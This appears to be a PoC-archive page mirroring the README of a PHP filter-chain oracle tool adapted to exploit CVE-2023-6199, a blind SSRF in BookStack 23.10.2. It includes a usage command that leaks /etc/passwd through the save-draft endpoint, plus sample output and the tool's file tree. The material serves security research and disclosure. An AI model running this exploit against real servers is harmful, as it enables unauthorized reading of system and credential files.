Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-6199 PoC — BookStack 代码问题漏洞

Source
https://github.com/AbdrrahimDahmani/php_filter_chains_oracle_exploit_for_CVE-2023-6199
Associated Vulnerability
Title:BookStack 代码问题漏洞 (CVE-2023-6199)
Description:BookStack是BookStack公司的一个简单、自托管、易于使用的平台。用于组织和存储信息。 BookStack 23.10.2版本存在代码问题漏洞,该漏洞源于允许过滤服务器上的本地文,导致应用程序容易受到 SSRF 的攻击。
Description
A CLI to exploit parameters vulnerable to PHP filter chain error based oracle, modified to exploit CVE-2023-6199
Readme
# PHP filter chains: file read from error-based oracle. Updated Script to exploit CVE-2023-6199

A CLI to exploit parameters affected by the file read caused by the the error-based oracle of PHP filter chains. It can be used to leak the content of a local file when passed to vulnerable functions, such as `file()`, `hash_file()`, `file_get_contents()` or `copy()`, even when the server does not return the file content!
In this case we use it to read file by exploiting an SSRF vulnerability in Book Stack version 23.10.2 identified by CVE-2023-6199, which allows filtering local files on the server

## Example of Usage

```bash
$ python3 filters_chain_oracle_exploit.py --parameter html --headers '{"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}' --verb PUT --target http://localhost:80/ajax/page/your_page_number/save-draft --file '/etc/passwd'
```

```bash
[*] The following URL is targeted : http://checker.htb/ajax/page/9/save-draft
[*] The following local file is leaked : /etc/passwd
[*] Running PUT requests
[*] Additionnal headers used : {"Content-Type": "application/x-www-form-urlencoded","X-CSRF-TOKEN":"your_CSRF_token","Cookie":"bookstack_session=your_session_token"}
[+] File /etc/passwd leak is finished!
```

## References

- [CVE-2023-6199 - MITRE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6199)  
- [LFR via Blind SSRF in BookStack - Fluid Attacks](https://fluidattacks.com/blog/lfr-via-blind-ssrf-book-stack/?utm_source=mailing&utm_medium=activecampaign&utm_campaign=blognov22)  
- [PHP Filter Chains Oracle Exploit - Synacktiv](https://github.com/synacktiv/php_filter_chains_oracle_exploit)
File Snapshot

 [4.0K]  /data/pocs/59ea3a10664bd81ce96c2cb3189aa889878eee6b
├── [4.0K]  filters_chain_oracle
│   ├── [4.0K]  core
│   │   ├── [ 16K]  bruteforcer.py
│   │   ├── [6.3K]  requestor.py
│   │   ├── [ 303]  utils.py
│   │   └── [ 157]  verb.py
│   └── [4.0K]  tests
│       ├── [   0]  __init__.py
│       └── [4.7K]  test.py
├── [7.5K]  filters_chain_oracle_exploit.py
├── [ 368]  LICENSE
├── [1.7K]  README.md
└── [   9]  requirements.txt

3 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.